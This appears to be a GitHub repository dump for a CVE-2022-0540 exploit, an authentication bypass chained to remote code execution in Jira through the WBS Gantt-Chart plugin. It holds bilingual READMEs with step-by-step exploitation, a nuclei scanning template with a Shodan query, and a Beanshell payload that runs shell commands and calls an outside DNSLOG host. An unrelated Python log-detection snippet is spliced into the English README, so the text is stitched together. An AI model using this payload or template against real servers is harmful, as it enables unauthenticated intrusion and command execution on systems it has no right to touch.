├── README.md
├── README_CN.md
├── exploit.yaml
└── images
    ├── image-20220525173951955.png
    ├── image-20220525190523282.png
    ├── image-20220525190607569.png
    ├── image-20220525190640472.png
    ├── image-20220525190657966.png
    ├── image-20220525190713512.png
    ├── image-20220525190728145.png
    ├── image-20220525190740547.png
    ├── image-20220525190756503.png
    └── image-20220525190830668.png

/README.md:
--------------------------------------------------------------------------------
# Atlassian Jira Seraph Authentication Bypass RCE (CVE-2022-0540)

## Exploit Details

As described in the vulnerability author's [blog](https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/), Atlassian published a long list of affected plugins (the vast majority of which were false positives), and the author listed the few plugins that are actually affected.

![image-20220525190523282](images/image-20220525190523282.png)

Following the stated exploitation conditions, combined with the official documentation for [WBS Gantt-Chart for Jira](https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate):

![image-20220525190607569](images/image-20220525190607569.png)

Essentially, this is RCE through the Beanshell Script of a Task in the plugin's job scheduler module. The exploit details are as follows.

1. For manual operation it is easiest to use Burp Suite's replace function, `Proxy > Options > Match and Replace`, and add a rule.

![image-20220525190640472](images/image-20220525190640472.png)

2. With Burp as a proxy, access the vulnerable Jira instance and open `http://IP:PORT/secure/WBSGanttManageScheduleJobAction.jspa;`. You can then view the `job scheduler configuration`.

![image-20220525190657966](images/image-20220525190657966.png)

Because the final Beanshell Script is executed as a scheduled task, you can change the execution interval for convenience by clicking Edit and adjusting it in Cron format.

3. Create a Task

![image-20220525190713512](images/image-20220525190713512.png)

4. Configure the Task

![image-20220525190728145](images/image-20220525190728145.png)

After the configuration is complete, clicking Update redirects to the login page. Do not worry: the Task has actually been added in the background.

5. Enable the Task

![image-20220525190740547](images/image-20220525190740547.png)

A newly created Task is Disabled by default; change it to Enabled manually, then wait a few seconds for the Script to execute.

6. DNSLOG record

![image-20220525190756503](images/image-20220525190756503.png)

At the same time, you can see the "execution completed" prompt in the job scheduler.

![image-20220525190830668](images/image-20220525190830668.png)
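The request shape from step 2, a `.jspa` path with a trailing `;`, is the same thing the nuclei template in the next section keys on. The following Python is an added defender-side log check and is not part of this repository: it scans constructed common-log-format access log lines (an assumed layout; adapt `LOG_RE` to your proxy or Tomcat access-log format) for that path shape and marks hits that received an HTTP 200 with no authenticated user.

```python
import re
from typing import Dict, List, Optional

# Common-log-format access line (assumed layout; adapt to your proxy or
# Tomcat access-log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# A .jspa path carrying a ';' path parameter before any query string, the
# shape of /secure/WBSGanttManageScheduleJobAction.jspa; used in step 2.
# Legitimate path parameters (e.g. ;jsessionid=) would match too; allowlist
# them if your deployment uses URL session rewriting.
BYPASS_RE = re.compile(r'^(?P<path>/[^?;\s]*\.jspa);', re.IGNORECASE)

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one access-log line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for a bypass-shaped request, or None if benign.

    'likely-success' means the server answered 200 to a client with no
    authenticated user ('-'), the signal the nuclei template's status
    matcher relies on; any other matching request is an 'attempt'.
    """
    rec = parse_line(line)
    if rec is None:
        return None
    m = BYPASS_RE.match(rec["target"])
    if m is None:
        return None
    unauth_ok = rec["status"] == "200" and rec["user"] == "-"
    return {"ip": rec["ip"], "path": m.group("path"), "status": rec["status"],
            "outcome": "likely-success" if unauth_ok else "attempt"}

def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Classify every line and keep only the findings, in log order."""
    return [h for h in (classify(l) for l in lines) if h is not None]

# Constructed sample lines, not real traffic: a bypass that got a 200, a
# normal authenticated page load, and a bypass attempt that was redirected.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/May/2022:17:39:51 +0800] "GET /secure/WBSGanttManageScheduleJobAction.jspa; HTTP/1.1" 200 18342',
    '198.51.100.7 - alice [25/May/2022:17:40:02 +0800] "GET /secure/Dashboard.jspa HTTP/1.1" 200 9211',
    '203.0.113.5 - - [25/May/2022:17:40:10 +0800] "GET /secure/Dashboard.jspa;?x=1 HTTP/1.1" 302 0',
]
```

Running `scan(SAMPLE_LOG)` returns two findings: the first line as `likely-success` and the third as `attempt`; the authenticated Dashboard load is ignored.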
Preconditions

```
WBS Gantt-Chart for Jira <= 9.14.3.1
```

## Verify Exploitable

```yaml
id: CVE-2022-0540

info:
  name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540)
  author: DhiyaneshDK
  severity: critical
  description: |
    Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
    - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0540
    cwe-id: CWE-287
  metadata:
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2022,atlassian,jira,exposure,auth-bypass

requests:
  - method: GET
    path:
      - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'WBS Gantt-Chart'

      - type: regex
        regex:
          - '([.|\D]*?)'
        dsl: []

      - type: status
        status:
          - 200
```

Run demo

```
nuclei -l targets.txt -t exploit.yaml
```

Screenshot

![image-20220525173951955](images/image-20220525173951955.png)

## References

https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/

https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate

Beanshell Script

```java
import java.io.IOException;
import java.lang.*;

// Beanshell payload run by the scheduler Task; the ping to the DNSLOG
// hostname is what produces the record shown in step 6.
Runtime runtime = Runtime.getRuntime();

try {

    String command = "ping -nc 1 55d2721a.dns.1433.eu.org";

    if (System.getProperty("os.name").toLowerCase().contains("windows")) {
        runtime.exec(new String[]{"cmd.exe", "/c", command});
    } else {
        runtime.exec(new String[]{"/bin/bash", "-c", command});
    }

} catch (IOException e) {
    e.printStackTrace();
}
```

***The information mentioned in this article is intended for legitimate, authorized penetration testing, internal company security checks and research use only. The user is responsible for any adverse consequences arising from the use of the information provided in this article.***

--------------------------------------------------------------------------------
/README_CN.md:
--------------------------------------------------------------------------------
# Atlassian Jira Seraph Authentication Bypass Remote Code Execution Vulnerability (CVE-2022-0540)

## Exploit Details

According to the vulnerability author's article, Atlassian published a long list of affected plugins (the vast majority are false positives), while the author named the few plugins that are actually affected.

![image-20220525190523282](images/image-20220525190523282.png)

Based on the stated exploitation conditions, combined with the [official documentation](https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate) of the WBS Gantt-Chart for Jira plugin:

![image-20220525190607569](images/image-20220525190607569.png)

Essentially, the Beanshell Script of a Task in the job scheduler module is used to achieve RCE. The exploitation process is as follows.

1. (For convenience) use the Burp proxy's replace function `Proxy > Options > Match and Replace` to create a new rule.

![image-20220525190640472](images/image-20220525190640472.png)

2. Turn on the Burp proxy and access the target Jira; visit `http://IP:PORT/secure/WBSGanttManageScheduleJobAction.jspa;` to bypass authentication and view the `job scheduler configuration`.

![image-20220525190657966](images/image-20220525190657966.png)

Because the Beanshell Script we finally execute runs as a scheduled task, you can change the execution interval for convenience: click Edit and modify it following the Cron format.

3. Create a Task

![image-20220525190713512](images/image-20220525190713512.png)

4. Configure the Task

![image-20220525190728145](images/image-20220525190728145.png)

After the configuration is complete, clicking Update automatically redirects to the login page, but the Task has actually been added in the background.

5. Enable the Task

![image-20220525190740547](images/image-20220525190740547.png)

Newly created Tasks are in the Disabled state by default; change them to Enabled manually, then wait a few seconds for the Script to execute.

6. Obtain the DNSLOG record

![image-20220525190756503](images/image-20220525190756503.png)

At the same time, the job scheduler shows a prompt that command execution has completed.

![image-20220525190830668](images/image-20220525190830668.png)

Preconditions

```
WBS Gantt-Chart for Jira <= 9.14.3.1
```

## Verify Exploitable

```yaml
id: CVE-2022-0540

info:
  name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540)
  author: DhiyaneshDK
  severity: critical
  description: |
    Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
    - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0540
    cwe-id: CWE-287
  metadata:
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2022,atlassian,jira,exposure,auth-bypass

requests:
  - method: GET
    path:
      - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'WBS Gantt-Chart'

      - type: regex
        regex:
          - '([.|\D]*?)'
        dsl: []

      - type: status
        status:
          - 200
```

Run example

```
nuclei -l targets.txt -t exploit.yaml
```

Screenshot

![image-20220525173951955](images/image-20220525173951955.png)

## References

https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/

https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate

Beanshell Script

```java
import java.io.IOException;
import java.lang.*;

// Beanshell payload run by the scheduler Task; the ping to the DNSLOG
// hostname is what produces the record shown in step 6.
Runtime runtime = Runtime.getRuntime();

try {
    String command = "ping -nc 1 55d2721a.dns.1433.eu.org";

    if (System.getProperty("os.name").toLowerCase().contains("windows")) {
        runtime.exec(new String[]{"cmd.exe", "/c", command});
    } else {
        runtime.exec(new String[]{"/bin/bash", "-c", command});
    }

} catch (IOException e) {
    e.printStackTrace();
}
```

***Disclaimer: The information mentioned in this article is intended only for legal, authorized penetration testing, internal company security checks and research use. The user is responsible for any adverse consequences arising from the use of the information provided in this article.***

--------------------------------------------------------------------------------
/exploit.yaml:
--------------------------------------------------------------------------------
id: CVE-2022-0540

info:
  name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540)
  author: DhiyaneshDK
  severity: critical
  description: |
    Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
    - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0540
    cwe-id: CWE-287
  metadata:
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2022,atlassian,jira,exposure,auth-bypass

requests:
  - method: GET
    path:
      - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'WBS Gantt-Chart'

      - type: regex
        regex:
          - '([.|\D]*?)'
        dsl: []

      - type: status
        status:
          - 200
--------------------------------------------------------------------------------
/images/image-20220525173951955.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525173951955.png
--------------------------------------------------------------------------------
/images/image-20220525190523282.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190523282.png
--------------------------------------------------------------------------------
/images/image-20220525190607569.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190607569.png
--------------------------------------------------------------------------------
/images/image-20220525190640472.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190640472.png
--------------------------------------------------------------------------------
/images/image-20220525190657966.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190657966.png
--------------------------------------------------------------------------------
/images/image-20220525190713512.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190713512.png
--------------------------------------------------------------------------------
/images/image-20220525190728145.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190728145.png
--------------------------------------------------------------------------------
/images/image-20220525190740547.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190740547.png
--------------------------------------------------------------------------------
/images/image-20220525190756503.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190756503.png
--------------------------------------------------------------------------------
/images/image-20220525190830668.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Pear1y/CVE-2022-0540-RCE/0ffa42842202419010a9d9499b8c80ed8505a223/images/image-20220525190830668.png
--------------------------------------------------------------------------------